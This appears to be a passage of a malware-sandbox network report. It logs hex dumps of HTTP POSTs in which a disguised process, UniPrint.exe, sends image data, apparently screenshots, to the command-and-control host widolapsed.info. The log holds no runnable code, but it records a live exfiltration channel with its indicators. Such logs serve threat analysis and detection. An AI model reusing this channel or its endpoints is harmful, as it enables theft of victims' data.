                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:30 UTC2122OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:30 UTC2138OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:30 UTC2154OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:30 UTC2170OUTData Raw: 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d 25 19 a7 70 b0 51 49 45 20 16 8c d2 51 40 58 5c d1 4d cd 19 a5 71 d8 5a 33 4d cd 19 a2 e1 61 73 46 69 33 49 9a 57 1d 87 66 92 93 34 66 8b 85 85 a2 93 34 66 90 0b 9a 4a 4c d2 13 45 c7 61 73 49 9a 4a 29 5c 76 16 92 8a 4a 06 29 a4 a2 8a 40 2d 25 14 50 01 45 14 50 03 81 a3 34 dc d1 9a 77 0b 0b 9a 29 29 29 05 85 a0 d1 9a 4a 43 0a 05 14 50 02 d1 45 25 31 10 51 45 2d 64 6a 14 55 bd 33 4c bd d5 6e 1e 0d 3e 0f 3a 44 42 ec bb 82 e1 72 06
                                                                                                      Data Ascii: QIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi%pQIE Q@X\MqZ3MasFi3IWf4f4fJLEasIJ)\vJ)@-%PEP4w)))JCPE%1QE-djU3Ln>:DBr
                                                                                                      2021-09-15 11:46:30 UTC2180OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 30 39 30 36 31 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2060090614--
                                                                                                      2021-09-15 11:46:31 UTC2180INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:30 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=644e733c34fda1ac1be1a5f8792b47c5c52e62b9da7ec7efb9e808c0a5708dce; expires=Thu, 15-Sep-2022 11:46:30 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:31 UTC2181INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.34981945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:31 UTC2181OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76670
                                                                                                      Content-Type: multipart/form-data; boundary=--------1263745405
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 36 33 37 34 35 34 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1263745405Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ba d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:31 UTC2197OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:31 UTC2213OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:31 UTC2229OUTData Raw: a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f f7 a5
                                                                                                      Data Ascii: M6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/
                                                                                                      2021-09-15 11:46:31 UTC2245OUTData Raw: a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16
                                                                                                      Data Ascii: (()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64.
                                                                                                      2021-09-15 11:46:31 UTC2256OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 36 33 37 34 35 34 30 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1263745405--
                                                                                                      2021-09-15 11:46:32 UTC2256INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:31 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=1943433717168773c3c7d1693b89b6c2cd68d0e8384afe77e8c223cc0b705860; expires=Thu, 15-Sep-2022 11:46:31 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:32 UTC2256INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.34982045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:32 UTC2256OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76644
                                                                                                      Content-Type: multipart/form-data; boundary=--------3327901999
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 32 37 39 30 31 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3327901999Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9c d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:32 UTC2273OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:32 UTC2289OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:32 UTC2305OUTData Raw: 4c a5 86 7d 5a 46 4e 29 e2 37 3c 05 27 f0 ad 13 a9 69 f1 ff 00 ab b5 27 eb 48 75 c0 bf ea ad 63 1f 5a 3d a5 47 b4 43 d8 53 5b c8 a8 b6 93 b7 48 cf e5 56 ed 34 db 8f 34 31 43 d6 a3 6d 76 e8 fd d0 8b f4 14 c4 d5 6f 1e 45 cc a7 04 f6 15 32 55 9a 34 a6 a8 46 4b 76 5c f1 9a ed 86 d4 1f 4a e5 f4 ff 00 f9 08 db ff 00 d7 45 ae 9b c6 24 b5 b5 a1 3d 4a d7 33 a7 ff 00 c8 46 df fe ba 0f e7 4b 0f fc 03 ae b7 f1 8f 42 d4 52 dc cc 1a 69 42 9c 74 aa 46 6d 36 3e ae 4d 56 f1 21 22 f5 70 7f 86 b1 7a f7 ac 28 50 e6 82 6d 93 89 c6 72 54 71 51 3a 03 a9 e9 e9 f7 22 26 98 75 c8 97 fd 5d b8 ac 2a 2b 75 85 87 53 91 e3 ea f4 36 1b 5f 9b f8 23 51 50 3e b3 76 dd 1b 1f 4a ce a2 a9 61 e9 ae 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f
                                                                                                      Data Ascii: L}ZFN)7<'i'HucZ=GCS[HV441CmvoE2U4FKv\JE$=J3FKBRiBtFm6>MV!"pz(PmrTqQ:"&u]*+uS6_#QP>vJaOY-rzVtj9jVZo
                                                                                                      2021-09-15 11:46:32 UTC2321OUTData Raw: 45 25 14 00 b4 94 b4 50 02 51 45 14 00 51 45 14 00 b4 52 51 40 0b 4b 4d a5 a0 42 d2 51 45 00 2e 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 5a 29 29 69 88 29 69 28 a6 01 45 14 52 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 4a 5a 60 14 51 45 02 16 8a 4a 28 01 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 28 a2 8a 62 16 92 8a 28 01 68 a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57
